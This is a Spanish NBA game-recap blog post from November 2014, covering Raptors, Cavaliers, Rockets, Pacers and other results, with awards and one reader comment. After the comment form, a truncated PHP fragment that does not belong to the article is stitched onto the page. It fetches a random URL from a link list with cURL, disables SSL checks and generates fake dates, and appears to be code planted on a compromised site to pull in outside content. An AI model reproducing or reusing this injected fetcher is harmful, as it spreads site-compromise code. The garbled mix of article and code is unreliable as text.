La crónica: Rey en el Norte

25 de November de 2014 por MagicJohnson32

Los Raptors se confirman en lo más alto del Este, LeBron ejerce de líder ante las dudas, los Clippers hunden un poco más a los Hornets, Harden aprovecha la lesión de Melo y los Pacers dan la campanada. Son solo algunas de las historias que dejó la madrugada en la NBA.

Las repasamos.

valanciunas

Phoenix Suns 100 – Toronto Raptors 104

La mejor racha del Este pertenece a los Raptors, propietarios también de la primera plaza de la Conferencia gracias en parte a un calendario bastante benevolente pero también a los muchos méritos que acumula el equipo canadiense en este arranque de curso. Anoche sobrevivieron a unos Suns peleones, que no se rindieron pese a verse 17 puntos abajo en el último cuarto en una exhibición de dominio interior de Jonas Valanciunas. El cuarto período, sin embargo, fue una película muy diferente y gracias a su acierto exterior, los Suns, que anotaron 10 triples en el período final (4 de Thomas), llegaron a colocarse por delante a 3 minutos para el final. La balanza se decantó del lado de los Raptors a causa de dos pérdidas visitantes que no emborronan la trayectoria ascendente de los de Hornacek.

Orlando Magic 74 – Cleveland Cavaliers 106

Se acabó la racha perdedora de los Cavs. Tras cuatro derrotas consecutivas, se hacía imperioso un triunfo, a ser posible contundente, contra un equipo a priori asequible como los Magic. LeBron se aseguró de que así fuese y no perdió tiempo en ponerse a ello. Anotó 16 puntos en el primer cuarto, en el que los locales abrieron brecha y ya no miraron atrás. Apoyados en una mejor defensa colectiva (los 74 puntos anotados por los Magic fueron el mínimo de un rival de los Cavs este año), James pudo finalizar varios de sus característicos contraataques e insuflar confianza a un equipo al que él mismo había llamado “frágil” apenas 24 horas antes. No fue, de todos modos, un triunfo brillante para los Cavs, ya que no esconde las dudas sobre los papeles de Irving y, especialmente Kevin Love, pero ver que LeBron puede ser dominante en este equipo es un buen primer paso.

Resto de la jornada

Contundente victoria de los Clippers (113-92) en pista de unos Hornets nuevamente decepcionantes y que ya suman 6 derrotas seguidas. El Big Three de Doc Rivers se comportó como tal, con un Blake Griffin mayúsculo al frente, y deja a Charlotte lejos de ese proyecto ilusionante que veíamos hace unas semanas. Los dos partidos más igualados de la madrugada se vivieron en Utah y Houston. El EnergySolutions de Salt Lake City vio con decepción como el tiro final de Gordon Hayward, liberado por una vez de la marca de Butler y con la posibilidad de ganar el partido, se quedaba corto (97-95) y daba así la victoria a los Bulls con Gasol y Rose de vuelta a la cancha. En Houston hizo falta la versión más clutch de James Harden para que los Rockets venciesen a los Knicks (86-91), pese a que Melo Anthony tuvo que abandonar en el segundo cuarto con problemas en la espalda. Llegaron los neoyorquinos con ventaja al último cuarto pero Harden desmanteló la defensa visitante, sacó faltas, anotó 12 puntos en los últimos 5 minutos y aseguró la victoria para los texanos. La sorpresa del día (y sorpresa de las grandes) se vivió en Dallas, donde unos Pacers con quinteto casi de D-League superaron a los Mavs (111-100). Sin Paul George, George Hill, Hibbert, West, etc. el líder de los Pacers fue Donald Sloan, motivado por jugar en casa y bien secundado por Scola y Solomon Hill. Más historia de la prevista tuvo también el Blazers-Sixers, al menos durante la primera mitad. Finalmente se impuso la lógica (114-104) gracias a Aldridge y a la propia incapacidad de los Sixers.

PREMIOS

MVPJames Harden no solo completó una hoja estadística para enmarcar (36 puntos, 6 rebotes, 6 asistencias, 3 robos) sino que apareció en los últimos minutos del partido para darle la vuelta al marcador y liderar a los suyos a la victoria. Anotó 12 de sus 36 puntos en los últimos 5 minutos. LaMarcus Aldridge puso las cosas en su sitio en el tercer cuarto ante Philadelphia al anotar 15 de sus 33 puntos (que completó con 11 rebotes y 3 asistencias). Blake Griffin firmó unos espectaculares 22 puntos, 16 rebotes y 9 asistencias, y LeBron fue simplemente LeBron ante los Magic.

RookieNerlens Noel fue el mejor de la noche con 12 puntos, 5 rebotes, 3 asistencias, 3 robos y 2 tapones.

Sorpresa: El sorpresón de la jornada estuvo liderado por Donald Sloan con 29 puntos y una enorme serie de 10 de 14 en TC. Trey Burke estuvo pletórico ante los Bulls con 18 puntos y 10 asistencias.

Decepción: Jimmy Butler amargó la noche de Gordon Hayward hasta límites insospechados. 2 de 11 en tiro y 3 pérdidas para el jugador de los Jazz. Lance Stephenson se quedó sin disputar un minuto del último cuarto y es que su actuación hasta el momento estaba siendo deplorable (1 de 8 en tiro para solo 3 puntos). Goran Dragic tampoco es el mismo que el del año pasado. Ayer se quedó en 6 puntos y 4 asistencias.

Esfuerzo en vano: Los Suns se quedaron muy cerca de remontar el partido en casa de los Raptors. Eric Bledsoe fue el mejor de los de Arizona con 25 puntos, 7 rebotes, 6 asistencias, 2 robos y 2 tapones. Actuación completa donde las haya.

Top 10

Imágenes | AP Photos / Getty Images

Comenta

Un comentario a esta entrada

  1. jhc dice:
    #1

    Que buena pinta tienen estos Raptors, sin grandes estrellas pero con un bloque en el que cada dia es uno diferente el que tira del resto.

    Nerlens Noel parece que empieza a carburar, aunque yo si jugara para Phila namás que pudiera me largaría para que se les quite la ganas de tanking

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>